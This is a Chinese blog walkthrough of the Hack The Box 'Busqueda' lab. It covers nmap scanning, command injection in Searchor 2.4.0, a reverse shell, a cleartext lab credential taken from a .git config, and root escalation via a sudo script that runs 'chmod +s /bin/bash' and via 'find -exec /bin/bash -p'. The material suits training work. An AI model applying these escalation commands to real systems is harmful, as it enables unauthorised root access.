<!DOCTYPE html>
<html lang=zh>
<head>
    <!-- hexo-inject:begin --><!-- hexo-inject:end --><!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="HTB靶机 难度：easy">
<meta property="og:type" content="article">
<meta property="og:title" content="HTB_Busqueda">
<meta property="og:url" content="https://qingfeng.tech/2023/04/05/HTB%20Busqueda/index.html">
<meta property="og:site_name" content="清风的博客">
<meta property="og:description" content="HTB靶机 难度：easy">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/HTB_Busqueda/image-20230604130826-wx5ents.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/HTB_Busqueda/image-20230604130829-1adkl2k.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/HTB_Busqueda/image-20230604130835-6v2ym90.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/HTB_Busqueda/image-20230604130839-tv6gkfh.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/HTB_Busqueda/image-20230604130854-agj6vp9.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/HTB_Busqueda/image-20230604130848-hi9mgpb.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/HTB_Busqueda/image-20230604130858-qtmr22s.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/HTB_Busqueda/image-20230604130902-ohvs8gl.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/HTB_Busqueda/image-20230604130905-2iuhlis.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/HTB_Busqueda/image-20230604130909-ruv7c8v.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/HTB_Busqueda/image-20230604130911-tfef5uo.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/HTB_Busqueda/image-20230604130915-kebkcqm.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/HTB_Busqueda/image-20230604130919-xs85eji.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/HTB_Busqueda/image-20230604130923-7w869jp.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/HTB_Busqueda/image-20230604130927-rqa2ok3.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/HTB_Busqueda/image-20230604130932-eg0cf4a.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/HTB_Busqueda/image-20230604130935-jpnhwsg.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/HTB_Busqueda/image-20230604130938-tjjqxwx.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/HTB_Busqueda/image-20230604130942-f2f5z2u.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/HTB_Busqueda/image-20230604130945-3okta9u.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/HTB_Busqueda/image-20230604130950-nlihi6m.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/HTB_Busqueda/image-20230604130954-arut9dc.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/HTB_Busqueda/image-20230604130957-8gfopbn.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/HTB_Busqueda/image-20230604131001-jyrrs06.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/HTB_Busqueda/image-20230604131005-hheppei.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/HTB_Busqueda/image-20230604131015-eakz84x.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/HTB_Busqueda/image-20230604131020-fcgxft7.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/HTB_Busqueda/image-20230604131029-yhbb2wc.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/HTB_Busqueda/image-20230604131032-71699oh.png">
<meta property="article:published_time" content="2023-04-04T16:00:00.000Z">
<meta property="article:modified_time" content="2023-10-16T11:04:56.752Z">
<meta property="article:author" content="清风">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://qingfeng.tech/Blogimages/HTB_Busqueda/image-20230604130826-wx5ents.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>HTB_Busqueda</title>
    <!-- async scripts -->
    <!-- Google Analytics -->


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 6.3.0"><link rel="stylesheet" href="/css/prism-tomorrow.css" type="text/css"><!-- hexo-inject:begin --><!-- hexo-inject:end --></head>

<body class="max-width mx-auto px3 ltr">
    
      <!-- hexo-inject:begin --><!-- hexo-inject:end --><div id="header-post">
  <a id="menu-icon" href="#" aria-label="目录"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="目录"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="顶部" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">首页</a></li><!--
     --><!--
       --><li><a href="/about/">关于</a></li><!--
     --><!--
       --><li><a href="/archives/">归档</a></li><!--
     --><!--
       --><li><a href="/categories/">分类</a></li><!--
     --><!--
       --><li><a href="/%E5%8F%8B%E4%BA%BA%E9%93%BA/">友链</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="上一篇" href="/2023/05/09/JNDI%E6%B3%A8%E5%85%A5/"><i class="fa-solid fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="下一篇" href="/2023/04/02/RMI/"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="返回顶部" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="分享文章" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">上一篇</span>
      <span id="i-next" class="info" style="display:none;">下一篇</span>
      <span id="i-top" class="info" style="display:none;">返回顶部</span>
      <span id="i-share" class="info" style="display:none;">分享文章</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://qingfeng.tech/2023/04/05/HTB%20Busqueda/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://qingfeng.tech/2023/04/05/HTB%20Busqueda/&text=HTB_Busqueda"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://qingfeng.tech/2023/04/05/HTB%20Busqueda/&title=HTB_Busqueda"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://qingfeng.tech/2023/04/05/HTB%20Busqueda/&is_video=false&description=HTB_Busqueda"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=HTB_Busqueda&body=Check out this article: https://qingfeng.tech/2023/04/05/HTB%20Busqueda/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://qingfeng.tech/2023/04/05/HTB%20Busqueda/&title=HTB_Busqueda"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://qingfeng.tech/2023/04/05/HTB%20Busqueda/&title=HTB_Busqueda"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://qingfeng.tech/2023/04/05/HTB%20Busqueda/&title=HTB_Busqueda"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://qingfeng.tech/2023/04/05/HTB%20Busqueda/&title=HTB_Busqueda"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://qingfeng.tech/2023/04/05/HTB%20Busqueda/&name=HTB_Busqueda&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://qingfeng.tech/2023/04/05/HTB%20Busqueda/&t=HTB_Busqueda"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#HTB-Busqueda"><span class="toc-number">1.</span> <span class="toc-text">HTB Busqueda</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%B5%B7%E6%AD%A5%E5%87%86%E5%A4%87"><span class="toc-number">1.0.1.</span> <span class="toc-text">起步准备</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%BC%80%E5%90%AF%E9%A2%98%E7%9B%AE"><span class="toc-number">1.0.2.</span> <span class="toc-text">开启题目</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Busqueda"><span class="toc-number">1.1.</span> <span class="toc-text">Busqueda</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%BC%80%E5%A7%8B%E5%81%9A%E9%A2%98"><span class="toc-number">1.1.1.</span> <span class="toc-text">开始做题</span></a></li></ol></li></ol></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        HTB_Busqueda
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">清风</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2023-04-04T16:00:00.000Z" class="dt-published" itemprop="datePublished">2023-04-05</time>
        
        (Updated: <time datetime="2023-10-16T11:04:56.752Z" class="dt-updated" itemprop="dateModified">2023-10-16</time>)
        
      
    </div>


      
    <div class="article-category">
        <i class="fa-solid fa-archive"></i>
        <a class="category-link" href="/categories/%E9%9D%B6%E6%9C%BA/">靶机</a>
    </div>


      

    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <h1 id="HTB-Busqueda"><a href="#HTB-Busqueda" class="headerlink" title="HTB Busqueda"></a>HTB Busqueda</h1><h3 id="起步准备"><a href="#起步准备" class="headerlink" title="起步准备"></a>起步准备</h3><p><strong>官网注册：</strong>​<a target="_blank" rel="noopener" href="https://app.hackthebox.com/">https://app.hackthebox.com</a></p>
<p><strong>注册完之后准备使用kali连接vpn了：</strong></p>
<p>​​<img src="/Blogimages/HTB_Busqueda/image-20230604130826-wx5ents.png" alt="image">​​</p>
<p>​​<img src="/Blogimages/HTB_Busqueda/image-20230604130829-1adkl2k.png" alt="image">​​</p>
<p>​​<img src="/Blogimages/HTB_Busqueda/image-20230604130835-6v2ym90.png" alt="image">​​</p>
<p>​​<img src="/Blogimages/HTB_Busqueda/image-20230604130839-tv6gkfh.png" alt="image">​​</p>
<p><strong>下载好后，会有一个ovpn文件：</strong></p>
<p>​​<img src="/Blogimages/HTB_Busqueda/image-20230604130854-agj6vp9.png" alt="image">​​</p>
<p><strong>把这个文件放到Kali里面（这里最好放到是选择普通用户的目录，这样子可以直接复制粘贴，要是直接放在桌面也可以，个人觉得还是创建一个专属于靶机的目录比较好），使用命令：</strong></p>
<p><strong>openvpn lab.ovpn</strong></p>
<p><strong>连接一下</strong></p>
<p>​​<img src="/Blogimages/HTB_Busqueda/image-20230604130848-hi9mgpb.png" alt="image">​​</p>
<h3 id="开启题目"><a href="#开启题目" class="headerlink" title="开启题目"></a>开启题目</h3><p>​​<img src="/Blogimages/HTB_Busqueda/image-20230604130858-qtmr22s.png" alt="image">​​</p>
<p>​​<img src="/Blogimages/HTB_Busqueda/image-20230604130902-ohvs8gl.png" alt="image">​​</p>
<p>​​<img src="/Blogimages/HTB_Busqueda/image-20230604130905-2iuhlis.png" alt="image">​​</p>
<p>​​<img src="/Blogimages/HTB_Busqueda/image-20230604130909-ruv7c8v.png" alt="image">​​</p>
<p><strong>启动之后会有一个内网地址：</strong></p>
<p>​​<img src="/Blogimages/HTB_Busqueda/image-20230604130911-tfef5uo.png" alt="image">​​</p>
<h2 id="Busqueda"><a href="#Busqueda" class="headerlink" title="Busqueda"></a>Busqueda</h2><h3 id="开始做题"><a href="#开始做题" class="headerlink" title="开始做题"></a>开始做题</h3><p><strong>启动靶机，有一个IP：10.10.11.208，直接访问好像并行不通：</strong></p>
<p>​​<img src="/Blogimages/HTB_Busqueda/image-20230604130915-kebkcqm.png" alt="image">​​</p>
<p><strong>Nmap使用命令</strong>​<code>nmap -A</code>​扫描后得到如下结果：</p>
<pre class=" language-bash"><code class="language-bash">Nmap scan report <span class="token keyword">for</span> 10.10.11.208 <span class="token punctuation">(</span>10.10.11.208<span class="token punctuation">)</span>
Host is up <span class="token punctuation">(</span>0.41s latency<span class="token punctuation">)</span>.
Not shown: 997 closed tcp ports <span class="token punctuation">(</span>conn-refused<span class="token punctuation">)</span>
PORT     STATE    SERVICE  VERSION
22/tcp   <span class="token function">open</span>     <span class="token function">ssh</span>      OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 <span class="token punctuation">(</span>Ubuntu Linux<span class="token punctuation">;</span> protocol 2.0<span class="token punctuation">)</span>
<span class="token operator">|</span> ssh-hostkey: 
<span class="token operator">|</span>   256 4f:e3:a6:67:a2:27:f9:11:8d:c3:0e:d7:73:a0:2c:28 <span class="token punctuation">(</span>ECDSA<span class="token punctuation">)</span>
<span class="token operator">|</span>_  256 81:6e:78:76:6b:8a:ea:7d:1b:ab:d4:36:b7:f8:ec:c4 <span class="token punctuation">(</span>ED25519<span class="token punctuation">)</span>
80/tcp   <span class="token function">open</span>     http     Apache httpd 2.4.52
<span class="token operator">|</span>_http-server-header: Apache/2.4.52 <span class="token punctuation">(</span>Ubuntu<span class="token punctuation">)</span>
<span class="token operator">|</span>_http-title: Did not follow redirect to http://searcher.htb/
1149/tcp filtered bvtsonar
Service Info: Host: searcher.htb<span class="token punctuation">;</span> OS: Linux<span class="token punctuation">;</span> CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ <span class="token keyword">.</span>
Nmap done: 1 IP address <span class="token punctuation">(</span>1 host up<span class="token punctuation">)</span> scanned <span class="token keyword">in</span> 163.39 seconds
</code></pre>
<p><strong>发现他的</strong>​<code>Hosts</code>​是<code>sercher.htb</code>​</p>
<p><strong>在root权限下使用：</strong></p>
<p><strong>echo &quot;10.10.11.208 sercher.htb&quot;&gt;&gt;&#x2F;etc&#x2F;hosts</strong></p>
<p><strong>&#x2F;&#x2F;切记切记，这里用的是追加写入，不要覆盖写了</strong></p>
<p><strong>把这个DNS情况输入到本机情况，这样子就可以访问了：</strong></p>
<p>​​<img src="/Blogimages/HTB_Busqueda/image-20230604130919-xs85eji.png" alt="image">​​</p>
<p><strong>访问之后发现下面有一个</strong>​<code>Powered by Flask and Searchor 2.4.0</code>​</p>
<p>​​<img src="/Blogimages/HTB_Busqueda/image-20230604130923-7w869jp.png" alt="image">​​</p>
<p><strong>发现输入什么返回什么，有两个想法：</strong></p>
<ol>
<li><strong>SSTI模板注入</strong></li>
<li><strong>系统命令执行</strong></li>
</ol>
<p><strong>第一想法肯定是SSTI注入，怎么有人傻傻地后台使用危险函数来回显用户输入</strong></p>
<p><strong>测试SSTI：</strong></p>
<p>​​<img src="/Blogimages/HTB_Busqueda/image-20230604130927-rqa2ok3.png" alt="image">​​</p>
<p><strong>什么居然不是SSTI</strong></p>
<p><strong>不会真的是系统命令吧</strong></p>
<p><strong>尝试系统命令：</strong></p>
<p>​​<img src="/Blogimages/HTB_Busqueda/image-20230604130932-eg0cf4a.png" alt="image">​​</p>
<p><strong>我天，真的是，你不如杀了我</strong></p>
<p><strong>那就反弹shell了，原本是尝试反弹到公网IP的，但是失败了，不知道是不出网还是什么原因，那就弹到Kali吧：</strong></p>
<p><strong>先看一下kali的IP地址</strong></p>
<p>​​<img src="/Blogimages/HTB_Busqueda/image-20230604130935-jpnhwsg.png" alt="image">​​</p>
<p>​​<img src="/Blogimages/HTB_Busqueda/image-20230604130938-tjjqxwx.png" alt="image">​​</p>
<p><strong>吃到shell后就可以执行命令了：</strong></p>
<p>​​<img src="/Blogimages/HTB_Busqueda/image-20230604130942-f2f5z2u.png" alt="image">​​</p>
<p><strong>然后我的思路就完全卡壳了，我flag呢</strong></p>
<p><strong>于是接下来都是WP的思路了：</strong></p>
<p><strong>原来还有一个.git文件（其实刚才看到有用到github的项目就应该想到有.git了），以后执行查看文件都用ll了，用ls会漏掉隐藏文件</strong></p>
<p><strong>对.git文件的信息收集有点不知道，恶补一下：</strong>​<a target="_blank" rel="noopener" href="https://blog.csdn.net/start_mao/article/details/94609238">https://blog.csdn.net/start_mao&#x2F;article&#x2F;details&#x2F;94609238</a></p>
<p>​​<img src="/Blogimages/HTB_Busqueda/image-20230604130945-3okta9u.png" alt="image">​​</p>
<p><strong>然后</strong>​<code>cat config</code>​查看仓库的配置信息</p>
<p>​​<img src="/Blogimages/HTB_Busqueda/image-20230604130950-nlihi6m.png" alt="image">​​</p>
<p><strong>这里可以看出来</strong></p>
<p><strong>用户名:cody</strong></p>
<p><strong>密码:jh1usoih2bkjaspwe92</strong></p>
<p>​​<img src="/Blogimages/HTB_Busqueda/image-20230604130954-arut9dc.png" alt="image">​​</p>
<p><strong>但是使用whoami的时候又有一个用户名，使用ssh登陆的时候可以发现用户名其实是svc</strong></p>
<p>​​<img src="/Blogimages/HTB_Busqueda/image-20230604130957-8gfopbn.png" alt="image">​​</p>
<p><strong>ssh连接果然可以连接上以后</strong></p>
<p><strong>执行命令sudo -l</strong></p>
<p>​​<img src="/Blogimages/HTB_Busqueda/image-20230604131001-jyrrs06.png" alt="image">​​</p>
<p><strong>按他的提示我们运行一下这个py脚本：</strong></p>
<p>​​<img src="/Blogimages/HTB_Busqueda/image-20230604131005-hheppei.png" alt="image">​​</p>
<p><strong>提示需要一个full-checkup的东西，wp说是sh脚本，不知道为什么。。。</strong></p>
<pre class=" language-bash"><code class="language-bash">回显su: must be run from a terminal 需要一个终端

利用以下代码解决：
<span class="token keyword">echo</span> <span class="token string">"import pty; pty.spawn('/bin/bash')"</span> <span class="token operator">></span> /tmp/asdf.py
python /tmp/asdf.py
</code></pre>
<p>‍</p>
<p>那就创建这个脚本：</p>
<p>vim full-checkup.sh</p>
<p>内容：</p>
<pre class=" language-bash"><code class="language-bash"><span class="token shebang important">#!/bin/bash</span>

<span class="token function">chmod</span> +s /bin/bash
</code></pre>
<p>接着赋予这个脚本+x权限</p>
<pre class=" language-bash"><code class="language-bash"><span class="token function">chmod</span> +x full-checkup.sh
</code></pre>
<p>下一步就是提权了</p>
<pre class=" language-bash"><code class="language-bash"><span class="token function">sudo</span> /usr/bin/python3 /opt/scripts/system-checkup.py  full-checkup
</code></pre>
<p>​​<img src="/Blogimages/HTB_Busqueda/image-20230604131015-eakz84x.png" alt="image">​​</p>
<p><strong>出现Done！则表示提权成功</strong></p>
<p>输入命令 <code>/bin/bash</code>​ 进入bash模式的命令行</p>
<p>​​<img src="/Blogimages/HTB_Busqueda/image-20230604131020-fcgxft7.png" alt="image">​​</p>
<p><strong>接下来使用find提权：</strong></p>
<p><strong>find . -exec &#x2F;bin&#x2F;bash -p ;</strong></p>
<p><strong>如果find命令有suid则可以利用find命令提权，这里注意应该加上-p参数，网上大多数版本并没有-p选项，导致不能真正的以root权限开启一个新的shell</strong></p>
<p><strong>利用普通用户执行find命令，要查找一个存在的文件，这里的点是查找当前目录</strong></p>
<p><strong>-p参数的解释：</strong></p>
<p>**当真实用户id和有效用户id不匹配时打开。禁用处理$ENV文件和导入shell功能。关闭此选项将导致有效的uid和Gid设置为真实uid和Gid。 **</p>
<pre class=" language-bash"><code class="language-bash"><span class="token function">bash</span> -p参数
-p  Turned on whenever the real and effective user ids <span class="token keyword">do</span> not match.
    Disables processing of the <span class="token variable">$ENV</span> <span class="token function">file</span> and importing of shell
    functions.  Turning this option off causes the effective uid and
    gid to be <span class="token keyword">set</span> to the real uid and gid.
</code></pre>
<p>​​​<img src="/Blogimages/HTB_Busqueda/image-20230604131029-yhbb2wc.png" alt="image">​​​</p>
<p><strong>这样子就成功变成root权限了，最后进入到&#x2F;root，可以拿到root.txt这个flag</strong></p>
<p>​​<img src="/Blogimages/HTB_Busqueda/image-20230604131032-71699oh.png" alt="image">​​</p>
<p><strong>还有一个flag在&#x2F;home&#x2F;svc 下，两个都交完应该算是完成了</strong></p>
<p>‍</p>

  </div>
</article>

    <div class="blog-post-comments">
        <div id="disqus_thread">
            <noscript>加载评论需要在浏览器启用 JavaScript 脚本支持。</noscript>
        </div>
    </div>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">首页</a></li>
        
          <li><a href="/about/">关于</a></li>
        
          <li><a href="/archives/">归档</a></li>
        
          <li><a href="/categories/">分类</a></li>
        
          <li><a href="/%E5%8F%8B%E4%BA%BA%E9%93%BA/">友链</a></li>
        
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#HTB-Busqueda"><span class="toc-number">1.</span> <span class="toc-text">HTB Busqueda</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%B5%B7%E6%AD%A5%E5%87%86%E5%A4%87"><span class="toc-number">1.0.1.</span> <span class="toc-text">起步准备</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%BC%80%E5%90%AF%E9%A2%98%E7%9B%AE"><span class="toc-number">1.0.2.</span> <span class="toc-text">开启题目</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Busqueda"><span class="toc-number">1.1.</span> <span class="toc-text">Busqueda</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%BC%80%E5%A7%8B%E5%81%9A%E9%A2%98"><span class="toc-number">1.1.1.</span> <span class="toc-text">开始做题</span></a></li></ol></li></ol></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://qingfeng.tech/2023/04/05/HTB%20Busqueda/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://qingfeng.tech/2023/04/05/HTB%20Busqueda/&text=HTB_Busqueda"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://qingfeng.tech/2023/04/05/HTB%20Busqueda/&title=HTB_Busqueda"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://qingfeng.tech/2023/04/05/HTB%20Busqueda/&is_video=false&description=HTB_Busqueda"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=HTB_Busqueda&body=Check out this article: https://qingfeng.tech/2023/04/05/HTB%20Busqueda/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://qingfeng.tech/2023/04/05/HTB%20Busqueda/&title=HTB_Busqueda"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://qingfeng.tech/2023/04/05/HTB%20Busqueda/&title=HTB_Busqueda"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://qingfeng.tech/2023/04/05/HTB%20Busqueda/&title=HTB_Busqueda"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://qingfeng.tech/2023/04/05/HTB%20Busqueda/&title=HTB_Busqueda"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://qingfeng.tech/2023/04/05/HTB%20Busqueda/&name=HTB_Busqueda&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://qingfeng.tech/2023/04/05/HTB%20Busqueda/&t=HTB_Busqueda"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> 菜单</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> 目录</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> 分享</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> 返回顶部</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2022-2023
    清风
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">首页</a></li><!--
     --><!--
       --><li><a href="/about/">关于</a></li><!--
     --><!--
       --><li><a href="/archives/">归档</a></li><!--
     --><!--
       --><li><a href="/categories/">分类</a></li><!--
     --><!--
       --><li><a href="/%E5%8F%8B%E4%BA%BA%E9%93%BA/">友链</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"复制到粘贴板！\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "复制成功！");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

    <script type="text/javascript">
        var disqus_shortname = 'cactus-1';

        (function(){
            var dsq = document.createElement('script');
            dsq.type = 'text/javascript';
            dsq.async = true;
            dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
            (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
        }());
    </script>

<!-- utterances Comments --><!-- hexo-inject:begin --><!-- hexo-inject:end -->

</body>
</html>
